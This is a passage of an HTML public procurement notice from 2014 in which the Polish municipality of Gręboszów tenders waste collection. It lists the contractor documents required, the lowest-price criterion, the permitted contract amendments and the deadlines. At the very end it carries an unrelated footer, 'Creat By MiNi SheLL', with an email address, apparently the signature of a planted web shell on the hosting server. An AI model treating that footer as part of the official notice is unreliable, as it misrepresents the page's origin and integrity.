 ubiegania się o udzielenie zamówienia przez dwóch lub więcej wykonawców o udzielenie 
 niniejszego zamówienia, oceniane będzie ich łączne doświadczenie).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Oferta na wykonanie zamówienia wg wzoru (formularz ofertowy)  określonego w załączniku nr 1, 
b)	Dowód wniesienia wadium (kwota 3 000,00 zł),
c)	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej  ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. 
d)	Pełnomocnictwo dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego lub ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.
e)	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych 
od właścicieli nieruchomości, obejmujące  gminę Gręboszów (w przypadku wspólnego 
ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą 
być złożone przedmiotowe dokumenty dla każdego z nich).
f)	zezwolenie na transport na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. 
z 2013 r. poz. 21). W przypadku gdy Wykonawca jest zwolniony z obowiązku posiadania 
zezwolenia na transport, przedkłada zezwolenie na odzysk i unieszkodliwianie odpadów.
g)	wpis do rejestru prowadzonego przez Głównego Inspektora Ochrony Środowiska w zakresie 
zbierania zużytego sprzętu elektrycznego i elektronicznego zgodnie z ustawą o zużytym 
sprzęcie elektrycznym  i elektronicznym z dnia 29 lipca 2005 r. (t.j. Dz.U. z 2013 r., poz. 1155 ze zm.) lub zawarł umowę z podmiotem spełniającym wymogi Ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej Umowy, może nastąpić w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, 
z uwzględnieniem wskazanych warunków ich wprowadzenia:
1)	zmiany wysokości  opłat wynikających wprost z przepisów prawa a mających istotny wpływ na koszty świadczenia usług;
2)	odstąpienie na wniosek Zamawiającego od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałyby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych,
3)	gdy zmianie uległy stawki podatku VAT,
4)	wprowadzenie zmian w stosunku do opisu przedmiotu zamówienia w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia,
5)	zmiany powszechnie obowiązujących przepisów prawa (w tym aktów prawa miejscowego) w zakresie mającym wpływ na realizację przedmiotu Umowy,
6)	zdarzeń o charakterze siły wyższej, niezależnych od Stron Umowy, które uniemożliwiłyby terminowe 
i prawidłowe wykonanie zobowiązań. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu Umowy lub sposobu wykonania Umowy. Za siłę wyższą uważa się zdarzenie zewnętrzne, którego skutków nie da się przewidzieć, ani im zapobiec. W szczególności za siłę wyższą z zachowaniem powyższego będzie się uważać działania sił przyrody takie jak: huragan, trzęsienie ziemi, powódź oraz inne zdarzenia takie jak wojnę, zamieszki, skażenie radioaktywne,
7)	zmiany terminu wykonania przedmiotu Umowy spowodowane działaniem organów administracji, 
w szczególności: odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień bądź wydania decyzji, zezwoleń, uzgodnień po ustawowym terminie,
8)	wystąpienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeśli zmiany te są korzystne dla Zamawiającego,
9)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
  

        
2.	W związku z wskazanymi w ust.1 pkt 1 - 4 okolicznościami dopuszczalne jest zmniejszenie lub zwiększenie wynagrodzenia, przy czym zwiększenie wynagrodzenia dopuszczalne jest o kwotę nie większą niż udokumentowany wzrost kosztów świadczenia usługi.
3.	Dopuszcza się zmianę Umowy w zakresie sposobu spełniania przez Wykonawcę świadczenia odbierania
i zagospodarowania odpadów w przypadku zmiany przepisów prawa powszechnie obowiązującego wpływających na sposób spełniania świadczenia.
4.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej Umowy w formie aneksu do Umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/uggreboszow/Article/id,135590.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów, pokój nr 1 lub za zaliczeniem pocztowym, po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem składania ofert. Cena 100 zł + VAT 23 %...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2014 godzina 10:00, miejsce: Urząd Gminy Gręboszów, Gręboszów 144, 33-260 Gręboszów, pokój nr 11 (piętro) w sekretariacie Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com